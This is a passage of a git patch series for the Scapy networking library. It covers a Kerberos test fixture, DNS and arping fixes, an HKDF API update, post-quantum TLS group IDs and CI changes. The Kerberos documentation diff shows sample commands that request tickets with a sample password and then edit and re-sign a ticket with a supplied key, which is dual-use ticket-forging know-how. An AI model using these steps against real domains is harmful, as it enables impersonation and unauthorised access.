'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x01\\0\x82\x01X\xa0\x03\x02\x01\x12\xa2\x82\x01O\x04\x82\x01K\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xa3\x03?&\xb9\xf4\xba\xef\xcf\xcf\xb6(8\x91\x0f\xa3lq\xc6 f&Ou\xd8Bk\xe84s\xf1\xec\xf6\x97wY\xc6Un;\xf5\xdeh\xb9J\xd6\xaf\xf4r\x00\x80\x17\x8d\xc4p\x81\xac\x89\xf1\xf6\x98\xef\x1f\xb3\xe5\x91}\xf5m\x1a\xbd\x08\x1d\x0217W0\x81\xddZ\xec,J%\xe2o\x86\xef{"a\xe0\xe2hBc\xeb^\x8b\xa3\x8c\xf7W\xf9F\xc6&\x1a\x041\x0c\xdf\xc3S\xaa>\x04\x90\xd7\x8a\xdd\xf3j\x80#4_\x95u\xaby3\x0f\x878\xe3\',t\xa7\xe9\xba7&\xd6\x82y\x1d9\x06\xf1\xff\xaf\xb33O\xdb\x00\xc5\x19\xd0\xb7\t\xe9\xeb\xe0iv\x08\xaa\xf4\x00\xcaG\xbb7\xb9P\xcd\xcf\xcbC\x9b\xec\xfdH\x1b\xbf\x89\x11\x96L\xa8\xb4\\6\xcf\x9a\xa6\x16\xf0\xfb,\xaf\x06.qj\xf0\x03\xfd\xc0 \x80\xb6\xb84\xcf\xec\tW~5\xad,\x14-\xf05\x04\xb2\xd4[o\xce\xa3\xf9\x06\x08\x0e\xeb\x1e\xbf2\xd7\xe4\xc2\x14\xabn_\x0c8j;#\r\xee\xce\xa6\x1f\xc3+\xed\x0c\xb7\xabdb\xb4\x8b\xb2\xd0\xe97\xa5P\xcd\xf1\x96\x8aT:=\xfc\xd9\x1e\xb6q\xcdM\x16\xead\x81\x84/\xab\xdd\xc8\xe1\xed\x17\xa3\xf5\x1c\xf1\x98\xf1\xf7\xbd\xbc\xc8\xdf' = GSS_Accept_sec_context (SPNEGO_negTokenResp: KRB_AP_REQ->KRB_AP_REP) with KrbRandomPatcher(): @@ -1607,7 +1606,7 @@ assert auth.cksum.checksum.Exts[0].sprintf("%type%") == 'GSS_EXTS_CHANNEL_BINDIN # Hardcode (yes this will probably require updating this test) bytes(tok) -assert bytes(tok) == b'n\x82\x05\xf90\x82\x05\xf5\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x04\x03\x02\x05 \xa3\x82\x04\xa5a\x82\x04\xa10\x82\x04\x9d\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2\x160\x14\xa0\x03\x02\x01\x03\xa1\r0\x0b\x1b\x04cifs\x1b\x03dc1\xa3\x82\x04l0\x82\x04h\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\r\xa2\x82\x04Z\x04\x82\x04Vg\x1fa1\xb3\x8e\xe6\xe6\x82\xd6,\xb97\xb8\xb7\x9cX\x97S\x18/\x8d\xbc\xb1J\x91\xb01\x05*< \xf7\xb4\xc8\x9b\xf9\xa4\x1f\xe9\x96\r\x11*\xccs\xf6\xbde\'\xdf\xe7\x07\x00\xa3\xd3\xc2\xe7+K\xa6p]\xfc\x04\x0f\xd5o\x9d|\xd6\x0bX\x0e\xbe\xce\xc2\xbf\xb2@\xba\xaca\x96\x90\xdb\xd90\x1e\xd9\x8c\xac\x03|\xfd\xff\x8f\xf9j\xc9\x83X\x96\x9f52\xf9\xc6\xad\xc0v\xd16\xa0\xef\x96\xeb\xdd\xef)=\xf8y\xbbB\xad\xfb\xf7g\x044\xf3@\xadg>\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x0180\x82\x014\xa0\x03\x02\x01\x12\xa2\x82\x01+\x04\x82\x01\'\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xef\x8d\x1fqW\xbf(\x97S+\rs_zM\xee\xa7\xc2\x1a\x8eh1\xa4\xcb\x06\xed\x8e\xe6\xc0\x9a\xf7\x93g5\xa5vp\x0e~G\xaf:\xbb<\xaa2\x0e\xf8+l \xc5\xdb\x17,\xa9\x99\xae\x80\r\x0f\xdd4\x92\xf1\xa3h\xc3)^*I\x92\x01\x9f\x06jW\x1a\xac\x02r\x05\n`d\xd1\xda\xf5i\x9e\x04e\xa9\\,2\xf9\xa55\x16m\x92\x7fI\xe6\x81\x98\xe5V\xa1i\x17\xf0\x10\xf9\x16\x92\x81\x95mJ\xe3\xcc\x0f\x83gW\xca\xc5l\xc2~\x1fFmt~\x81\xd5%{\x87\xe1!\x15\xc4o\x163,\x8eg\xd4\xc5\xdc\xd7\x11at\x87v\x13j\xd0/\x07z/\xee\xd6\xd8b\x0b(\xae*\xd7\x87\xe3\xb7\x1b\xf8d\xd8\xbc\xadL7\x18a0o`\xa7\xd1Q\xe8\xf3\x9a\xf1\x95\xf2\xec\x06\xc0v\xba\x81\xc4\xbc7@8\x08\xd9\xa7{~\x8fz\xeeE\xdc\xc9\x81"\xb6b\x872=.\x19$KP\xcd\xfd\x85\x861@c\x05,\xa9\x98\xe9\x8e\x84A\x9f\n#&\xb2\xf4"\xa5O\x86\xc9\x93\xcb\x97\x0e\x18C\xf5\x00^\xe8De\x94|\xbaf' +assert bytes(tok) == b'n\x82\x06\x1d0\x82\x06\x19\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x04\x03\x02\x05 \xa3\x82\x04\xa5a\x82\x04\xa10\x82\x04\x9d\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2\x160\x14\xa0\x03\x02\x01\x03\xa1\r0\x0b\x1b\x04cifs\x1b\x03dc1\xa3\x82\x04l0\x82\x04h\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\r\xa2\x82\x04Z\x04\x82\x04Vg\x1fa1\xb3\x8e\xe6\xe6\x82\xd6,\xb97\xb8\xb7\x9cX\x97S\x18/\x8d\xbc\xb1J\x91\xb01\x05*< \xf7\xb4\xc8\x9b\xf9\xa4\x1f\xe9\x96\r\x11*\xccs\xf6\xbde\'\xdf\xe7\x07\x00\xa3\xd3\xc2\xe7+K\xa6p]\xfc\x04\x0f\xd5o\x9d|\xd6\x0bX\x0e\xbe\xce\xc2\xbf\xb2@\xba\xaca\x96\x90\xdb\xd90\x1e\xd9\x8c\xac\x03|\xfd\xff\x8f\xf9j\xc9\x83X\x96\x9f52\xf9\xc6\xad\xc0v\xd16\xa0\xef\x96\xeb\xdd\xef)=\xf8y\xbbB\xad\xfb\xf7g\x044\xf3@\xadg>\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x01\\0\x82\x01X\xa0\x03\x02\x01\x12\xa2\x82\x01O\x04\x82\x01K\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xa3\x03?&\xb9\xf4\xba\xef\xcf\xcf\xb6(8\x91\x0f\xa3lq\xc6 f&Ou\xd8Bk\xe84s\xf1\xec\xf6\x97wY\xc6Un;\xf5\xdeh\xb9J\xd6\xaf\xf4r\x00\x80\x17\x8d\xc4p\x81\xac\x89\xf1\xf6\x98\xef\x1f\xb3\xe5\x91}\xf5m\x1a\xbd\x08\x1d\x0217W0\x81\xdd\x10O\xda\x97\xf1qo\xa9\xdcT\xe4_\xfaxt\xdf\xcb*\x95L\xd3\x85\xdf\xf04\x14\xb3\x14\x9c1cU\xe5\x18H\xf3^\x86\xd4\xd2\xe39-Y\x0b\x80\x92\xf0\x08\x03\xc5\x99{;z\xc0\xdd\x08\x1d\x94\xd4\xa4\xda,9\x00\xa7\x87I\x01\x9b\xb7\xf0\x01ITC\xcdJr\xd7+\x95\xadI\xf0\x14\xfc7t\xa2\x9a\xa7\xe0mA\x8c\'\xf0\x9c\xbc\x97\xaa\xd6\xec\x82.\xfa^\x08\xa7\x1b\xef\xa8\x979\x93\x8f\x80.i\x05\xf3jj\xef2\xf4B`Q\xed_\xde\x00\x14\xee\xae \xd1\xbc6\x8b;\xf19\x1fikM\xadf\x15\xc9\xb7G\xf6\xa9,\x9cJ\xe9e\xa8\xcc\x8e.b\x86\x88\xb3!p\x04\xe6\x03/\x17\xae\x03\x13:\xe4\xedG%\x98$\x9d\x13<\x92\x16\x80:\x94\x8f\x87jb\xa6.\xc2\n\xbe\xdb\x9d3\x8d\xf5\xb2\\\x8b\xd6\xcb\xc0\xa6%\xc7\xb1\xe3m\x86\x1fsXj\x19\xad\xe7\x06\xfc\x0b\xf1\xcf' = GSS_Accept_sec_context (KRB_AP_REQ->KRB_AP_REP) - DCE_STYLE From 12a3752408c1b62ce646131789fa29fe2844a814 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 5 Oct 2025 12:29:33 +0200 Subject: [PATCH 1553/1632] Fix regression caused by #4847 (#4852) --- scapy/layers/dns.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 2c6dcc7af67..75e9be9330b 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1418,7 +1418,7 @@ def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, ** return result kwargs.setdefault("timeout", timeout) - kwargs.setdefault("verbose", verbose) + kwargs.setdefault("verbose", 0) # hide sr1() output res = None for nameserver in conf.nameservers: # Try all nameservers From 40cbcd2ae1217bd6008d13ffd37e938e2fdbc9b2 Mon Sep 17 00:00:00 2001 From: Xavier Mehrenberger Date: Mon, 6 Oct 2025 13:00:21 +0200 Subject: [PATCH 1554/1632] Replace stale method name in kerberos doc (#4857) --- doc/scapy/layers/kerberos.rst | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index 54998108188..168e2d7ecab 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -100,7 +100,7 @@ This section tries to give many usage examples, but isn't exhaustive. For more d >>> load_module("ticketer") >>> t = Ticketer() >>> t.request_tgt("Administrator@domain.local", password="ScapyScapy1") - >>> t.save("/tmp/krb5cc_1000") + >>> t.save_ccache("/tmp/krb5cc_1000") >>> exit() $ klist Ticket cache: FILE:/tmp/krb5cc_1000 @@ -240,7 +240,7 @@ As you can see, DMSA keys were imported in the keytab. You can use those as deta >>> t.show() Tickets: 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - >>> t.save(fname="blob.ccache") + >>> t.save_ccache(fname="blob.ccache") - **Edit tickets with the GUI** @@ -294,7 +294,7 @@ This ticket was saved to a ``.ccache`` file, that we'll know try to open. >>> t.edit_ticket(0) Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce >>> t.resign_ticket(0) - >>> t.save() + >>> t.save_ccache() 1660 >>> # Other stuff you can do >>> tkt = t.dec_ticket(0) @@ -321,7 +321,7 @@ Cheat sheet +---------------------------------------+--------------------------------+ | ``t.open_ccache("/tmp/krb5cc_1000")`` | Open a ccache file | +---------------------------------------+--------------------------------+ -| ``t.save()`` | Save a ccache file | +| ``t.save_ccache()`` | Save a ccache file | +---------------------------------------+--------------------------------+ | ``t.show()`` | List the tickets | +---------------------------------------+--------------------------------+ From 4296eeeb2ab6ad707099b27006474890469d9540 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Oct 2025 20:44:11 +0200 Subject: [PATCH 1555/1632] arping(): handle scanning on a unknown IP (#4856) --- scapy/interfaces.py | 9 ++++++--- scapy/layers/l2.py | 22 +++++++++++----------- test/scapy/layers/l2.uts | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 51 insertions(+), 14 deletions(-) diff --git a/scapy/interfaces.py b/scapy/interfaces.py index f9dd76b0f72..70846b91be5 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -293,8 +293,11 @@ def dev_from_index(self, if_index): return self.dev_from_networkname(conf.loopback_name) raise ValueError("Unknown network interface index %r" % if_index) - def _add_fake_iface(self, ifname, mac="00:00:00:00:00:00"): - # type: (str, str) -> None + def _add_fake_iface(self, + ifname, + mac="00:00:00:00:00:00", + ips=["127.0.0.1", "::"]): + # type: (str, str, List[str]) -> None """Internal function used for a testing purpose""" data = { 'name': ifname, @@ -304,7 +307,7 @@ def _add_fake_iface(self, ifname, mac="00:00:00:00:00:00"): 'dummy': True, 'mac': mac, 'flags': 0, - 'ips': ["127.0.0.1", "::"], + 'ips': ips, # Windows only 'guid': "{%s}" % uuid.uuid1(), 'ipv4_metric': 0, diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 532cd9a5f21..05bb6ba0c2b 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -1071,17 +1071,17 @@ def arping(net: str, hint = net[0] else: hint = str(net) - psrc = conf.route.route(hint, verbose=False)[1] - if psrc == "0.0.0.0": - if "iface" in kargs: - psrc = get_if_addr(kargs["iface"]) - else: - warning( - "No route found for IPv4 destination %s. " - "Using conf.iface. Please provide an 'iface' !" % hint) - psrc = get_if_addr(conf.iface) - hwaddr = get_if_hwaddr(conf.iface) - kargs["iface"] = conf.iface + psrc = conf.route.route( + hint, + dev=kargs.get("iface", None), + verbose=False, + _internal=True, # Do not follow default routes. + )[1] + if psrc == "0.0.0.0" and "iface" not in kargs: + warning( + "Could not find the interface for destination %s based on the routes. " + "Using conf.iface. Please provide an 'iface' !" % hint + ) ans, unans = srp( Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP( diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index 5f02bf991cd..1302d5e44f6 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -17,6 +17,40 @@ def _test(): retry_test(_test) += Arping - interface that has no ip +~ mock + +from unittest import mock + +_old_routes = conf.route.routes +_old_ifaces = conf.ifaces.data.copy() + +try: + conf.route.routes = [ + (180996905, 4294967295, '0.0.0.0', 'eth0', '10.201.203.41', 0), + (180997119, 4294967295, '0.0.0.0', 'eth0', '10.201.203.41', 0), + (0, 0, '10.201.203.254', 'eth0', '0.0.0.0', 0), + (180996864, 4294967040, '0.0.0.0', 'eth0', '10.201.203.41', 0), + (3758096384, 4026531840, '0.0.0.0', 'eth0', '10.201.203.41', 250) + ] + conf.ifaces._add_fake_iface("toto", mac="11:22:33:aa:bb:cc", ips=[]) + + def dummy_srp(pkts, **kwargs): + assert pkts.dst == "ff:ff:ff:ff:ff:ff" + assert pkts.src == "11:22:33:aa:bb:cc" + assert pkts[ARP].psrc == "0.0.0.0" + assert pkts[ARP].pdst == Net("192.168.0.1/24") + assert pkts[ARP].hwsrc == "11:22:33:aa:bb:cc" + # No results, we don't care. + return SndRcvList([]), PacketList(pkts) + + with mock.patch("scapy.layers.l2.srp", side_effect=dummy_srp): + arping("192.168.0.1/24", iface="toto") + +finally: + conf.route.routes = _old_routes + conf.ifaces.data = _old_ifaces + = Test ARPingResult output ~ manufdb From a4e81bc0dc43934773994e9e480750f2971af5ae Mon Sep 17 00:00:00 2001 From: Paul Kehrer Date: Thu, 16 Oct 2025 02:21:03 +0800 Subject: [PATCH 1556/1632] HKDF extract public API (#4861) Update HKDF extraction method to use public API if available. --- scapy/layers/tls/crypto/hkdf.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/crypto/hkdf.py b/scapy/layers/tls/crypto/hkdf.py index a4a3edfa9d0..649305666a5 100644 --- a/scapy/layers/tls/crypto/hkdf.py +++ b/scapy/layers/tls/crypto/hkdf.py @@ -27,10 +27,14 @@ def __init__(self, hash_name="sha256"): @crypto_validator def extract(self, salt, ikm): h = self.hash - hkdf = HKDF(h, h.digest_size, salt, None, default_backend()) if ikm is None: ikm = b"\x00" * h.digest_size - return hkdf._extract(ikm) + # cryptography 47.0.0 added this as a public API + if getattr(HKDF, "extract", None) is not None: + return HKDF.extract(h, salt, ikm) + else: + hkdf = HKDF(h, h.digest_size, salt, None, default_backend()) + return hkdf._extract(ikm) @crypto_validator def expand(self, prk, info, L): From 0085cd2c79c98ad5db3e8cd8214ad1dcc8c286f5 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 16 Oct 2025 15:13:41 +0200 Subject: [PATCH 1557/1632] Fix typo in http rst --- doc/scapy/layers/http.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index b7c5d5811fa..b1ce44c7a63 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -149,7 +149,7 @@ Start an unauthenticated HTTP server automaton: "

      404 - Not Found

      " ) - server = HTTP_Server.spawn( + server = Custom_HTTP_Server.spawn( port=8080, iface="eth0", ) From 4c213f11efbcaa42623d9f2ca46ef884a4a40e9e Mon Sep 17 00:00:00 2001 From: Povilas Balciunas Date: Tue, 14 Oct 2025 10:57:38 +0300 Subject: [PATCH 1558/1632] Add hybrid PQC KEM groups --- scapy/layers/tls/crypto/groups.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index 7bbb80f26a6..c659eae5e22 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -408,9 +408,19 @@ class ffdhe8192(_FFDHParams): # From RFC 7919 0xff01: "arbitrary_explicit_prime_curves", 0xff02: "arbitrary_explicit_char2_curves"} +_tls_post_quantum_hybrid = { + # https://www.ietf.org/archive/id/draft-kwiatkowski-tls-ecdhe-mlkem-02.html#name-secp256r1mlkem768 + 0x11EB: "SecP256r1MLKEM768", + # https://www.ietf.org/archive/id/draft-kwiatkowski-tls-ecdhe-mlkem-02.html#name-x25519mlkem768 + 0x11EC: "X25519MLKEM768", + # https://www.ietf.org/archive/id/draft-tls-westerbaan-xyber768d00-03.html#name-iana-considerations + 0x6399: "X25519Kyber768Draft00", +} + _tls_named_groups = {} _tls_named_groups.update(_tls_named_ffdh_groups) _tls_named_groups.update(_tls_named_curves) +_tls_named_groups.update(_tls_post_quantum_hybrid) def _tls_named_groups_import(group, pubbytes): From c776b9fab456a09f76db9267b108c3332536df85 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 16 Oct 2025 20:50:56 +0200 Subject: [PATCH 1559/1632] Switch to PyPy3.10 in tests (#4126) Co-authored-by: Nils Weiss --- .github/workflows/unittests.yml | 6 +++++- test/run_tests | 2 +- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index abcbfe9684f..9d175f35bb4 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -101,7 +101,7 @@ jobs: flags: " -K scanner" # PyPy tests: root only - os: ubuntu-latest - python: "pypy3.9" + python: "pypy3.10" mode: root flags: " -K scanner" # Libpcap test @@ -126,6 +126,10 @@ jobs: mode: root allow-failure: 'true' flags: " -k scanner" + - os: ubuntu-latest + python: "pypy3.10" + mode: root + flags: " -k scanner" - os: macos-14 python: "3.13" mode: both diff --git a/test/run_tests b/test/run_tests index a44808dfc56..3be633beae4 100755 --- a/test/run_tests +++ b/test/run_tests @@ -58,7 +58,7 @@ then export SIMPLE_TESTS="true" export PYTHON export DISABLE_COVERAGE=" " - PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") + PYVER=$($PYTHON -c "import sys,platform; print(('pypy' if platform.python_implementation() == 'PyPy' else '') + '.'.join(sys.version.split('.')[:2]))") bash ${DIR}/.config/ci/test.sh $PYVER non_root exit $? fi From 29d736052e91bb46dc3eb7fe7cbbbb02f4565410 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 16 Oct 2025 21:19:08 +0200 Subject: [PATCH 1560/1632] Add nbns_request() util (#4853) --- scapy/layers/dns.py | 2 +- scapy/layers/netbios.py | 95 +++++++++++++++++++++++++++++++++++++++++ scapy/route.py | 5 ++- scapy/sendrecv.py | 8 +++- 4 files changed, 107 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 75e9be9330b..21e8bb79045 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1405,7 +1405,7 @@ def dns_resolve(qname, qtype="A", raw=False, tcp=False, verbose=1, timeout=3, ** :param timeout: seconds until timeout (per server) :raise TimeoutError: if no DNS servers were reached in time. """ - # Unify types + # Unify types (for caching) qtype = DNSQR.qtype.any2i_one(None, qtype) qname = DNSQR.qname.any2i(None, qname) # Check cache diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 0995d67d771..3d20a0ae65b 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -34,9 +34,17 @@ XShortField, XStrFixedLenField ) +from scapy.interfaces import _GlobInterfaceType +from scapy.sendrecv import sr1 from scapy.layers.inet import IP, UDP, TCP from scapy.layers.l2 